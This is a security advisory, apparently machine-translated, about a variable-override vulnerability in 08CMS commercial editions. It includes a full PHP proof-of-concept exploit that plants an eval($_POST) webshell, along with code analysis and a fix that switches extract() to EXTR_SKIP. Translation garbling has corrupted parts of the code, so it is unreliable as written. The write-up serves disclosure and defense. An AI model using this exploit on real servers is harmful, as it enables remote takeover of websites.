08CMS Variable Override Write arbitrarily webshell into arbitrarily Path

Directory

1 . Vulnerability Description 2 . Vulnerability trigger Condition 3 . Vulnerability Impact Range 4 . Vulnerability Code Analysis 5 . Defense Methods 6. Defensive thinking

1. Vulnerability description

A brief description of the vulnerability

1. /include/general.inc.php//local Variable Registrationforeach(Array ('_post','_get') as$_request) {    foreach($$_request as$k =$v) {$k {0} !='_'&& $ $k =maddslashes ($v); }}/*The simulation GPC function is implemented here, registering the variables in the get and post data entered by the user into the local code space, causing the attacker to theoretically "inject" any variable value into the application.*/2. With local variable overrides, the hacker can control the write file operation that the target application will make and write arbitrary files to any location under the site directory.

2. Vulnerability Trigger Condition

0x1: Attack stream

 1  . Upload a non-php file that contains Webshell  /*  /tools/ptool.php. $CF = M_root. /DYNAMIC/STATS/ACLICKS.CAC '; $ct = M_root. /DYNAMIC/STATS/ACLICKS_TIME.CAC ';    if (@ $fp = fopen ($CF, ' a ')) {fwrite ($fp, "$aid");    Fclose ($FP); .. Write Webshell Code $exp =/tools/ptool.php?aid=<?php eval ($_post[a) by injecting $aid, using the program's local variable coverage vulnerability, and writing to/DYNAMIC/STATS/ACLICKS.CAC );?  */ 2   =/index.php?tplname=. /.. /dynamic/stats/ACLICKS.CAC  3 . The program opens/DYNAMIC/STATS/ACLICKS.CAC and re-writes to  / dynamic/stats/aclicks.cac.php  , complete the Getshell 

0x2:poc

<?PHP/*exp:index.php?tplname=. /.. /DYNAMIC/STATS/ACLICKS.CAC Auto cms shell:/dynamic/tplcache/common/....dynamicstatsaclicks.cac.php decorate CMS Shell/ dynamic/dynamic/stats/aclicks.cac.php*///$exp =/tools/ptool.php?aid=<?php eval ($_post[a]);? >$exp ='/tools/ptool.php?aid=%3c%3fphp%20eval%28%24_post%5ba%5d%29%3b%3f%3e';//$exp 1 =/index.php?tplname=. /.. /DYNAMIC/STATS/ACLICKS.CAC$exp 1 ='/index.php?tplname=. %2f. %2FDYNAMIC%2FSTATS%2FACLICKS.CAC'; if($ARGC <2) {Print_r ('+---------------------------------------------------------------------------+ [+] Php'. $argv [0].'[url]www.08sec.com[/URL]+---------------------------------------------------------------------------+');exit;} Error_reporting (E_error); Set_time_limit (0); $host= $ARGV [1];go ($host); function Go ($host) {Global$exp, $exp 1; $re=Send ($host, $exp); Stripos ($re,"MySQL") >0? Send ($host, $exp):""$re= Send ($host, $exp 1) && Stripos ($re,"ACLICKS.CAC") >0? Exit"+ Exploit Success!rn +/http $host/template/dynamic/stats/aclicks.cac.phprn"): Exit ("-Exploit Failed!n");} function Send ($host, $url) {$data="GET $url Http/1.1rn"; $data.="Host: $hostrn"; $data.="user-agent:mozilla/4.0 (compatible; MSIE 5.0; Windows $) Opera 6.03 [En]rn"; $data.="Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"; $data.="content-type:application/x-www-form-urlencodedrn"; $data.="ACCEPT-LANGUAGE:EN-USRN"; $data.="Connection:closernrn"; $FP= @fsockopen ($host, the); if(!$fp) {Die ("[-] Connect to host Errorrn");    } fwrite ($fp, $data); $back="';  while(!feof ($FP)) {$back.= Fread ($FP,1024x768);    } fclose ($FP); return$back;}?>

Relevant Link:

http://www.unhonker.com/bug/1390.html

3. Vulnerability Impact Range

08CMS All Commercial Editions

4. Vulnerability Code Analysis

Local variable registration implementation code

/include/general.inc.php

/index.php

Include_once dirname (__file__).'/include/general.inc.php'; include_once m_root.'./include/common.fun.php'; if_siteclosed (); Mobile_open ()|| Message'Mobile version is not yet open');/*function Un_virtual ($str) {... $str = str_replace (Array ('/', '-'), Array (' & ', ' = '), $str); replace/and-substitute & and = ... return $str;} Parse_str () parses the query string into a variable, stored in the variable $temparr*/parse_str (un_virtual ($_server['query_string']), $temparr); .. $_da=Array ();if(!$cnstr) {    //$tplname This is defined here, it's equivalent to being initialized.$tplname = $_ismobile?$o _index_tpl: $HOMETPL; $_da['RSS'] = $cms _abs.'rss.php'; $_da+ = $temparr;//$_da= $_da+ $temparrUnset ($temparr);//Destroying variables//variable overlay so that we can control the $tplname variable, that is, overwrite it againextract ($_da,extr_overwrite); //This Tpl_refresh function is the key point of exploit.Tpl_refresh ($tplname); ...

/include/refresh.fun.php

function Tpl_refresh ($tplname) {Global$templatedir, $debugtag; $tdir= M_root."template/$templatedir/"; //$tplname can be controlled by an attacker, so $CACF is also equivalent to being controlled by an attacker$CACF = $tdir.'pcache/'. $tplname.'. PHP'; if(file_exists ($x = $tdir."function/utags.fun.php") {include_once $x; } mmkdir ($CACF,0,1); if($debugtag | |!file_exists ($CACF)) {    //open file, return content$str =Load_tpl ($tplname); $TPL= @file2str (m_root."template/$templatedir/". $tplname);//File2str This is the function that opens the file$rt && $tpl = preg_replace ("/{tpl\$ (. +?)} /ies","rtagval (' \1 ', ' $rt ')", $TPL); Filter $str= Preg_replace ("/<\? (?! php\s|=|\s) /I",'<?='<?'?>', $STR); $str= Preg_replace ("/<!--{(. +?)} -->/S","{\1}", $STR); Breplace ($str,"');        Nreplace ($STR);                        Quit_refresh_var (); $str=Tpl_basecode ($STR); /*the key to the vulnerability here is 1. $STR: An attacker can control the contents of a. cac file, which an attacker can overwrite with another variable to write a. CAC Webshell 2. $CACF: An attacker can control that an attacker's incoming parameter is a non-ph    P file path (. cac file), this file is also real, can be injected through another variable to upload a. cac file, at the same time, the program at the end of the mosaic ". Php", so that it becomes a php file to write from the results, the equivalent of a. CAC to. php suffix rename processing */str2file ($str, $CACF); } unset ($str, $tdir, $CACF);}

5. Defense Methods

/index.php

if(!$cnstr) {    //$tplname This is defined here, it's equivalent to being initialized.$tplname = $_ismobile?$o _index_tpl: $HOMETPL; $_da['RSS'] = $cms _abs.'rss.php'; $_da+ = $temparr;//$_da= $_da+ $temparrUnset ($temparr);//Destroying variables    /*if the strain amount already exists, no overwrite operation is performed*/Extract ($_da, extr_skip);       Tpl_refresh ($tplname); ...

6. Defensive Thinking

Defensive idea of defensive variable coverage

1 rerun the original code logic and assign the overridden variable back to the original value 2. Detection of keywords at the entrance of local variable registration

Copyright (c) Littlehann All rights reserved

08CMS Variable Override Write arbitrarily webshell into arbitrarily Path